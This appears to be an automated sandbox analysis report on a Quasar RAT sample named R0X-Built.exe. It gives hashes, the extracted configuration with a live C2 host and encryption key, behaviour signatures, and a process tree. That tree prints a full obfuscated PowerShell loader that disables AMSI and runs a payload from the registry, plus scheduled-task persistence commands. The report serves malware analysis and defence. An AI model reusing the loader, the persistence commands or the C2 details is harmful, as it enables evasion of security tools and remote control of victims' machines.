Analysis

  • max time kernel
    1800s
  • max time network
    1800s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02-05-2024 20:58

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 58 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:644
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:564
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d59cc9ce-2735-48f7-a282-e28e451bff22}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2836
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:692
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:1012
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:1044
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1056
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:1064
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1124
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1164
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1232
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NIJZbWKFLfIB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CRzkMlNzKtPPzX,[Parameter(Position=1)][Type]$rxNrNGRdqy)$ZXVBWNamKCO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+'l'+[Char](101)+'c'+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+'o'+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+'ype',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+'u'+'b'+''+'l'+''+'i'+''+[Char](99)+',S'+'e'+'al'+'e'+''+'d'+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+'ass,'+[Char](65)+'u'+'t'+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$ZXVBWNamKCO.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+'a'+''+[Char](108)+'Na'+'m'+''+[Char](101)+''+','+''+[Char](72)+'i'+'d'+'e'+[Char](66)+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$CRzkMlNzKtPPzX).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+'d');$ZXVBWNamKCO.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'yS'+'i'+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+'o'+''+'t'+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$rxNrNGRdqy,$CRzkMlNzKtPPzX).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+'e'+''+','+'M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');Write-Output $ZXVBWNamKCO.CreateType();}$pkvxycOUgOrVx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+'r'+[Char](111)+''+'s'+'o'+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+'.'+'U'+''+[Char](110)+'s'+[Char](97)+''+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+''+[Char](115)+'');$MPyiDEWfWKnzOC=$pkvxycOUgOrVx.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+'r'+'o'+''+'c'+''+[Char](65)+''+[Char](100)+''+'d'+''+'r'+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BWVIUxfoWiINNDjkhLp=NIJZbWKFLfIB @([String])([IntPtr]);$yDmhROVhPIJLPKSukzjBUc=NIJZbWKFLfIB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wJxOAyNHomu=$pkvxycOUgOrVx.GetMethod(''+'G'+''+'e'+'t'+'M'+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+'a'+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+'n'+[Char](101)+''+'l'+'3'+[Char](50)+'.d'+[Char](108)+''+'l'+'')));$BDJITykTwxrsye=$MPyiDEWfWKnzOC.Invoke($Null,@([Object]$wJxOAyNHomu,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+'r'+'a'+'r'+[Char](121)+'A')));$MeRmqJdACKBTiLpQD=$MPyiDEWfWKnzOC.Invoke($Null,@([Object]$wJxOAyNHomu,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'P'+[Char](114)+'o'+[Char](116)+'ec'+'t'+'')));$TKtVtOp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BDJITykTwxrsye,$BWVIUxfoWiINNDjkhLp).Invoke(''+'a'+''+'m'+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$AiRrhDdnbKoVCvVIL=$MPyiDEWfWKnzOC.Invoke($Null,@([Object]$TKtVtOp,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+'B'+[Char](117)+''+[Char](102)+'fe'+'r'+'')));$eCPDvGbyTu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MeRmqJdACKBTiLpQD,$yDmhROVhPIJLPKSukzjBUc).Invoke($AiRrhDdnbKoVCvVIL,[uint32]8,4,[ref]$eCPDvGbyTu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AiRrhDdnbKoVCvVIL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MeRmqJdACKBTiLpQD,$yDmhROVhPIJLPKSukzjBUc).Invoke($AiRrhDdnbKoVCvVIL,[uint32]8,0x20,[ref]$eCPDvGbyTu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+'s'+'t'+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2432
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                        1⤵
                          PID:1240
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1372
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                            • Drops file in System32 directory
                            PID:1444
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1452
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1556
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1572
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2844
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1580
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1712
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1728
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1788
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1852
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1952
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1828
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1896
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:2076
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2148
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2208
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2300
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2360
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2504
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2512
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2576
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                    PID:2624
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2664
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2700
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2712
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2720
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2928
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:3132
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:3268
                                                                              • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                2⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1940
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:2404
                                                                                • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4684
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                    4⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:2328
                                                                                • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1256
                                                                                • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                  "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1616
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                              1⤵
                                                                                PID:3416
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                1⤵
                                                                                  PID:3460
                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                  1⤵
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3852
                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3932
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                    1⤵
                                                                                      PID:4048
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:4072
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                        1⤵
                                                                                          PID:4308
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                          1⤵
                                                                                            PID:4472
                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3804
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:4912
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                1⤵
                                                                                                  PID:496
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:1496
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3688
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:4004
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                    1⤵
                                                                                                      PID:5068
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      PID:4112
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                      1⤵
                                                                                                        PID:4556
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:2968
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          1⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:1928
                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca
                                                                                                          1⤵
                                                                                                            PID:1872
                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                              C:\Windows\system32\WerFault.exe -u -p 1872 -s 952
                                                                                                              2⤵
                                                                                                              • Checks processor information in registry
                                                                                                              • Enumerates system info in registry
                                                                                                              PID:2564
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:5068
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                            1⤵
                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                            PID:1436
                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                            1⤵
                                                                                                              PID:1072
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                              1⤵
                                                                                                                PID:1812
                                                                                                              • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                1⤵
                                                                                                                  PID:940
                                                                                                                • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                  1⤵
                                                                                                                    PID:884
                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                    1⤵
                                                                                                                      PID:3976

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.8dee16fb-4e8d-4963-b7e1-e1c1442f8a48.tmp.txt
                                                                                                                      Filesize

                                                                                                                      13KB

                                                                                                                      MD5

                                                                                                                      c1b12cf1a74845eac1576004042ee5af

                                                                                                                      SHA1

                                                                                                                      95a9d9e27a7d56e9d449c32ebb4a63237762b883

                                                                                                                      SHA256

                                                                                                                      29548b730bbe5ee1d537e556c95257ed9f2c16f362d820b58ccb15816bd18b1d

                                                                                                                      SHA512

                                                                                                                      d080e534706f3d25d25b509dd7a68a46f1e46a4ef1acd79c3ce754f78680eeadbb70e8c852b6ae446199e385cd8484b3d9b01333acc7ce0c7dedad2e63195a2d

                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.96a054c8-02e2-4c14-a10f-51ce36cbf856.tmp.csv
                                                                                                                      Filesize

                                                                                                                      34KB

                                                                                                                      MD5

                                                                                                                      36e1531084dd2bee18f29469b335e8f8

                                                                                                                      SHA1

                                                                                                                      372f92b2461c32b7d3690bb5424535eb8bb09b16

                                                                                                                      SHA256

                                                                                                                      1c5ecc2c945b82dbd841567667a8e756c02dd561dcbb2de926d748b575d8ca45

                                                                                                                      SHA512

                                                                                                                      f2eabc3e68707fd54592b5c0335e40ce21429101569beb8868d07204a09365f7f3c4b10b3b75bc7b6dd487b1026dac85880631c09669e411e60de76ee11ce2e5

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                                      Filesize

                                                                                                                      404B

                                                                                                                      MD5

                                                                                                                      c2804e405c463f959f6abbac9bbf917d

                                                                                                                      SHA1

                                                                                                                      7a6d6239803c52852dc099ab7a765d6917916c66

                                                                                                                      SHA256

                                                                                                                      1694c206fe47f16c8f11d95725b0286068fb479904963185a83b09f70117e598

                                                                                                                      SHA512

                                                                                                                      4469bd4ab885bcc077347543f929d98fdb3dbcf3dae2fb6026b0137190892841dd38728a5bfcb68e181fe51de38464e266b279282a9cab7dc67ecd514d77c50f

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                      Filesize

                                                                                                                      162KB

                                                                                                                      MD5

                                                                                                                      152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                      SHA1

                                                                                                                      c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                      SHA256

                                                                                                                      a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                      SHA512

                                                                                                                      2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                    • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                                      Filesize

                                                                                                                      409KB

                                                                                                                      MD5

                                                                                                                      a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                                      SHA1

                                                                                                                      3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                                      SHA256

                                                                                                                      43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                                      SHA512

                                                                                                                      458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                                    • C:\Windows\Temp\__PSScriptPolicyTest_manoqsf1.osz.ps1
                                                                                                                      Filesize

                                                                                                                      60B

                                                                                                                      MD5

                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                      SHA1

                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                      SHA256

                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                      SHA512

                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                      Filesize

                                                                                                                      338B

                                                                                                                      MD5

                                                                                                                      dc686e464df39696c7081da4416fa71c

                                                                                                                      SHA1

                                                                                                                      6f0e8c3634112d71fd5b3790af31f2e8cfb64006

                                                                                                                      SHA256

                                                                                                                      d4c5ebdee49c2f2bd3fe2a599cebc4ce6e81f8f72d8d3061a979d0910bff99f1

                                                                                                                      SHA512

                                                                                                                      b455c9d664fc06c1bfb5b30c629aaa7617e5b7332062a342fbbd0d5e3e1070dc3ec556212f41d954bfabc86b92762a7a0639c27b178408dfededf5e35acd0dc8

                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                                                      Filesize

                                                                                                                      412B

                                                                                                                      MD5

                                                                                                                      d0789b1f395148e42b8cbff25cec11fd

                                                                                                                      SHA1

                                                                                                                      e60ba6f42824964cb3cb0de9e5540a3a16abb636

